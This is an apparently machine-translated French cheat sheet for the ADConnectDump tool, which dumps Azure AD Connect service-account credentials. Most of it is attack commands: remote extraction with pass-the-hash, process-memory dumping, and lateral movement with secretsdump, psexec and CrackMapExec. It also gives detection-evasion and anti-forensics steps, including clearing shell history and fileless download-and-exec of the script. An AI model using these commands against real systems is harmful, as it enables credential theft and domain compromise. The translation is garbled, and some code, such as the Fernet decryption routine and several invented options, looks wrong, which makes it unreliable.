ADConnectDump Azure AD Connect Outil d'extraction credentielle Feuille de chaleur
Aperçu général
ADConnectDump est un outil développé par Dirk-Jan Mollema pour extraire les identifiants et la configuration des serveurs Azure AD Connect. Il peut vider les identifiants de compte de service Azure AD Connect, qui ont souvent des privilèges élevés dans les environnements Active Directory et Azure AD sur site.
C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Installation du module PowerShell
# Download from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py" -OutFile "adconnectdump.py"
# Install Python dependencies
pip install impacket cryptography
# Alternative: Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
pip install -r requirements.txt
Installation manuelle
# Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
# Install dependencies
pip3 install impacket cryptography pyasn1
# Make executable
chmod +x adconnectdump.py
```_
### Installation Docker
```bash
# Build Docker image
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
docker build -t adconnectdump .
# Run in Docker
docker run -it -v $(pwd):/data adconnectdump
```_
## Utilisation de base
### Extraction locale de titres de créance
```bash
# Extract credentials from local AAD Connect server
python3 adconnectdump.py
# Extract with specific database
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract with custom output
python3 adconnectdump.py --output credentials.txt
# Extract in JSON format
python3 adconnectdump.py --format json --output credentials.json
Extraction à distance des titres de créance
# Extract from remote server
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password
# Extract using NTLM hash
python3 adconnectdump.py --host 192.168.1.100 --username administrator --hashes :ntlmhash
# Extract using Kerberos
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password --use-kerberos
# Extract with domain credentials
python3 adconnectdump.py --host 192.168.1.100 --username domain\\administrator --password password
Référence de commande
Options de base
| Option | Description |
|---|---|
--host |
Target hostname or IP |
--username |
Username for authentication |
--password |
Password for authentication |
--hashes |
NTLM hashes (LM:NT format) |
--database |
Path to ADSync database |
--output |
Output file path |
Options avancées
| Option | Description |
|---|---|
--format |
Output format (text/json) |
--use-kerberos |
Use Kerberos authentication |
--dc-ip |
Domain controller IP |
--target-ip |
Target IP address |
--port |
Target port (default 445) |
--debug |
Enable debug output |
Architecture de connexion AD Azure
Comprendre l'AAD Connexion
# Azure AD Connect components:
# 1. Synchronization Service (ADSync)
# 2. Database (LocalDB or SQL Server)
# 3. Service Accounts
# 4. Configuration Data
# Key files and locations:
# Database: C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
# Config: C:\Program Files\Microsoft Azure AD Sync\Bin\
# Logs: C:\ProgramData\AADConnect\
Identification du compte de service
# Identify AAD Connect service accounts
Get-Service|Where-Object \\\\{$_.Name -like "*ADSync*"\\\\}
# Check service account privileges
Get-WmiObject -Class Win32_Service|Where-Object \\\\{$_.Name -eq "ADSync"\\\\}|Select-Object StartName
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect" -Name "Version"
Techniques d'extraction des titres de créance
Accès aux bases de données locales
# Direct database access (requires local admin)
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract from backup database
python3 adconnectdump.py --database "C:\Backup\ADSync_backup.mdf"
# Extract from SQL Server instance
python3 adconnectdump.py --sql-server "SQLSERVER\INSTANCE" --database "ADSync"
Extraction à distance via SMB
# Extract via SMB with credentials
python3 adconnectdump.py --host aadconnect.domain.com --username "domain\admin" --password "password"
# Extract using pass-the-hash
python3 adconnectdump.py --host aadconnect.domain.com --username "admin" --hashes ":aad3b435b51404eeaad3b435b51404ee:hash"
# Extract with specific target IP
python3 adconnectdump.py --host aadconnect.domain.com --target-ip 192.168.1.100 --username "admin" --password "password"
Extraction de mémoire
# Extract from memory (requires admin privileges)
# Use tools like Mimikatz or ProcDump
# Dump ADSync process memory
procdump.exe -ma miiserver.exe aadsync_dump.dmp
# Extract credentials from memory dump
python3 adconnectdump.py --memory-dump aadsync_dump.dmp
Analyse de configuration
Analyse du schéma de base de données
-- Key tables in ADSync database
-- mms_management_agent: Contains connector information
-- mms_server_configuration: Server configuration
-- mms_synchronization_rule: Sync rules
-- mms_metaverse_object: Metaverse objects
-- Extract connector information
SELECT ma_name, ma_type, private_configuration_xml
FROM mms_management_agent;
-- Extract server configuration
SELECT applied_time, configuration_xml
FROM mms_server_configuration;
Analyse de fichier de configuration
# Analyze AAD Connect configuration files
$configPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\"
# Check connector configurations
Get-ChildItem -Path $configPath -Filter "*.xml"|ForEach-Object \\\\{
[xml]$config = Get-Content $_.FullName
Write-Host "File: $($_.Name)"
Write-Host "Connectors: $($config.SelectNodes('//connector').Count)"
\\\\}
# Extract service account information
$serviceConfig = Get-Content "$configPath\miiserver.exe.config"
$serviceConfig|Select-String -Pattern "connectionString\|serviceAccount"
Déchiffrement des titres de créance
Comprendre le chiffrement
# AAD Connect credential encryption process
# 1. Credentials encrypted with DPAPI
# 2. Machine key used for encryption
# 3. Service account context required
# Decryption process
import base64
from cryptography.fernet import Fernet
def decrypt_aad_connect_password(encrypted_password, key):
"""Decrypt AAD Connect password"""
try:
# Base64 decode
encrypted_data = base64.b64decode(encrypted_password)
# Decrypt using key
f = Fernet(key)
decrypted = f.decrypt(encrypted_data)
return decrypted.decode('utf-8')
except Exception as e:
print(f"Decryption failed: \\\\{e\\\\}")
return None
Décryptage manuel
# Manual credential decryption (PowerShell)
Add-Type -AssemblyName System.Security
function Decrypt-AADConnectPassword \\\\{
param(
[string]$EncryptedPassword,
[byte[]]$Key
)
try \\\\{
# Convert from base64
$encryptedBytes = [Convert]::FromBase64String($EncryptedPassword)
# Decrypt using DPAPI
$decryptedBytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$null,
[System.Security.Cryptography.DataProtectionScope]::LocalMachine
)
return [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
\\\\}
catch \\\\{
Write-Error "Decryption failed: $_"
return $null
\\\\}
\\\\}
Techniques post-exploitation
Utilisation des pouvoirs extraits
# Use extracted Azure AD credentials
# Typically format: MSOL_<guid>@<tenant>.onmicrosoft.com
# Authenticate to Azure AD
az login --username "MSOL_12345678-1234-1234-1234-123456789012@company.onmicrosoft.com" --password "extracted_password"
# Use with AADInternals
Import-Module AADInternals
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "MSOL_account@company.onmicrosoft.com" -Password "extracted_password"
Accès actif au répertoire sur place
# Use extracted on-premises credentials
# Format: domain\username
# Authenticate to domain
net use \\dc.domain.com\c$ /user:domain\MSOL_service_account extracted_password
# Use with Impacket tools
python3 secretsdump.py domain/MSOL_service_account:extracted_password@dc.domain.com
# Use with CrackMapExec
crackmapexec smb dc.domain.com -u MSOL_service_account -p extracted_password
Escalade des privilèges
# Check privileges of extracted account
Import-Module ActiveDirectory
Get-ADUser -Identity "MSOL_service_account" -Properties MemberOf|Select-Object -ExpandProperty MemberOf
# Check Azure AD privileges
Import-Module AADInternals
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "MSOL_account@company.onmicrosoft.com"
Évasion de détection
Techniques de vol
# Use legitimate tools and processes
# Avoid suspicious file names
# Use memory-only techniques when possible
# Rename tool
cp adconnectdump.py system_maintenance.py
# Use legitimate paths
mkdir -p /tmp/.system/maintenance/
cp adconnectdump.py /tmp/.system/maintenance/syscheck.py
Anti-forensiques
# Clear evidence after extraction
rm -f credentials.txt
rm -f credentials.json
history -c
# Use in-memory execution
python3 -c "
import urllib.request
exec(urllib.request.urlopen('https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py').read())
"
Calendrier et calendrier
# Perform extraction during maintenance windows
# Schedule for off-hours
# Use legitimate administrative sessions
# Example: Schedule extraction
echo "0 2 * * 0 /usr/bin/python3 /tmp/adconnectdump.py --output /tmp/.cache/system.log"|crontab -
Mesures défensives
Surveillance et détection
# Monitor AAD Connect database access
# Enable SQL Server auditing
# Monitor file system access to ADSync.mdf
# PowerShell monitoring script
$databasePath = "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = Split-Path $databasePath
$watcher.Filter = "ADSync.mdf"
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent -InputObject $watcher -EventName "Changed" -Action \\\\{
Write-EventLog -LogName "Application" -Source "AADConnect Monitor" -EventId 1001 -Message "ADSync database accessed"
\\\\}
Recommandations de durcissement
# Secure AAD Connect server
# 1. Restrict local admin access
# 2. Enable advanced auditing
# 3. Use dedicated service accounts
# 4. Implement network segmentation
# 5. Regular security updates
# Enable auditing
auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable
Automatisation et écriture
Script d'extraction automatique
#!/bin/bash
# Automated ADConnectDump script
TARGET_HOST="$1"
USERNAME="$2"
PASSWORD="$3"
OUTPUT_DIR="./adconnect_output"
if [ $# -ne 3 ]; then
echo "Usage: $0 <target_host> <username> <password>"
exit 1
fi
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Extract credentials
echo "Extracting AAD Connect credentials from $TARGET_HOST..."
python3 adconnectdump.py \
--host "$TARGET_HOST" \
--username "$USERNAME" \
--password "$PASSWORD" \
--format json \
--output "$OUTPUT_DIR/credentials_$(date +%Y%m%d_%H%M%S).json"
# Check if extraction was successful
if [ $? -eq 0 ]; then
echo "Extraction completed successfully"
echo "Output saved to $OUTPUT_DIR"
else
echo "Extraction failed"
exit 1
fi
Automatisation PowerShell
# PowerShell automation script
param(
[string]$TargetHost,
[string]$Username,
[string]$Password,
[string]$OutputPath = ".\adconnect_output"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
# Extract credentials
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = Join-Path $OutputPath "credentials_$timestamp.json"
Write-Host "Extracting AAD Connect credentials from $TargetHost..."
$process = Start-Process -FilePath "python3" -ArgumentList @(
"adconnectdump.py",
"--host", $TargetHost,
"--username", $Username,
"--password", $Password,
"--format", "json",
"--output", $outputFile
) -Wait -PassThru -NoNewWindow
if ($process.ExitCode -eq 0) \\\\{
Write-Host "Extraction completed successfully"
Write-Host "Output saved to $outputFile"
# Parse and display results
$credentials = Get-Content $outputFile|ConvertFrom-Json
Write-Host "Extracted $($credentials.Count) credential(s)"
\\\\} else \\\\{
Write-Error "Extraction failed with exit code $($process.ExitCode)"
\\\\}
Dépannage
Questions communes
# Database access denied
# Solution: Ensure proper privileges or use alternative extraction method
# Network connectivity issues
# Solution: Check firewall rules and network connectivity
ping aadconnect.domain.com
telnet aadconnect.domain.com 445
# Authentication failures
# Solution: Verify credentials and domain trust
net use \\aadconnect.domain.com\c$ /user:domain\username password
Mode de débogage
# Enable debug output
python3 adconnectdump.py --debug --host aadconnect.domain.com --username admin --password password
# Verbose logging
python3 adconnectdump.py -v --host aadconnect.domain.com --username admin --password password
# Test connectivity
python3 adconnectdump.py --test-connection --host aadconnect.domain.com
Vérification manuelle
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect"
# Check service status
Get-Service -Name "ADSync"
# Verify database location
$regPath = "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL13.LOCALDB\MSSQLServer"
Get-ItemProperty -Path $regPath -Name "DefaultData"
Intégration avec d'autres outils
Intégration de l'empacket
# Use extracted credentials with Impacket
python3 secretsdump.py domain/extracted_user:extracted_password@dc.domain.com
# Use with GetUserSPNs
python3 GetUserSPNs.py domain/extracted_user:extracted_password -dc-ip dc.domain.com
# Use with psexec
python3 psexec.py domain/extracted_user:extracted_password@target.domain.com
Intégration de BloodHound
# Use extracted credentials for BloodHound collection
Import-Module SharpHound
Invoke-BloodHound -CollectionMethod All -Domain domain.com -LDAPUser extracted_user -LDAPPass extracted_password
CrackMapExec Intégration
# Use extracted credentials with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password
# Check for local admin access
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password --local-auth
# Execute commands
crackmapexec smb target.domain.com -u extracted_user -p extracted_password -x "whoami"
Ressources
- [Résistoire de Dump GitHub ADConnect] (LINK_5)
- [Blogue Fox-IT sur Azure AD Connect] (LINK_5)
- [Azure AD Connect Security] (LINK_5)
- [Recherche Dirk-Jan Mollema] (LINK_5)
- [Meilleures pratiques en matière de sécurité de la DA d'Azure] (LINK_5)
*Cette feuille de triche fournit une référence complète pour utiliser ADConnectDump. Assurez-vous toujours d'avoir une autorisation appropriée avant de procéder à des évaluations de sécurité Azure AD Connect. *